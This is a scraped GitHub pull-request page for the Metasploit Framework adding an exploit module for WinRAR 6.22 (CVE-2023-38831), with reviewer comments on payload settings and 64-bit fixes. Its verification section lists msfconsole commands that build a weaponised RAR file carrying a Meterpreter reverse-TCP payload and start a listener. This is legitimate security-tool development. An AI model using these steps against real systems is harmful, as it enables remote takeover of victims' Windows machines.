-
Notifications
You must be signed in to change notification settings - Fork 14.1k
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
WinRAR 6.22 (CVE-2023-38831) #18341
WinRAR 6.22 (CVE-2023-38831) #18341
Conversation
Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools. We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:
You can automate most of these changes with the
Please update your branch after these have been made, and reach out if you have any problems. |
Linting should be fixed as well working with |
'Platform' => ['win'], | ||
'Targets' => [['Windows', {}]], | ||
'Payload' => { | ||
'Space' => 4096, |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Are we space constrained?
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Thank you @bwatters-r7 . Good point. I don't think so. In the beginning I put it in to be on the safe side but looking at the research we probably aren't. I can take it out and re-test if you want.
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Sure! I downloaded the software and was hoping to get this tested today.
@bwatters-r7 Confirmed it to be still working with the same options/settings as before but payload space removed. Thanks for the hint.
|
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
I realized the way you'd written this created a malformed 64-bit payload, so it crashed when you used a 64-bit payload. These changes will allow the module to properly create and deploy a 64-bit payload and let it autocomplete 64-bit payload names when you go to set them.
Co-authored-by: Brendan <[email protected]>
Co-authored-by: Brendan <[email protected]>
Co-authored-by: Brendan <[email protected]>
Co-authored-by: Brendan <[email protected]>
Much appreciated @bwatters-r7
|
No problem, @xaitax. Everything looks great. |
Release NotesThis PR adds a module covering CVE-2023-38831, a fileformat vulnerability affecting Winrar 6.22. |
Verification
msfconsole
use exploit/windows/fileformat/winrar_cve_2023_38831
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.100.100
set LPORT 1234
set INPUT_FILE /tmp/winrar_exploit.pdf
exploit
[+] Created /root/.msf4/local/poc.rar
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.100.100
set LPORT 1234
run
Target:
PoC: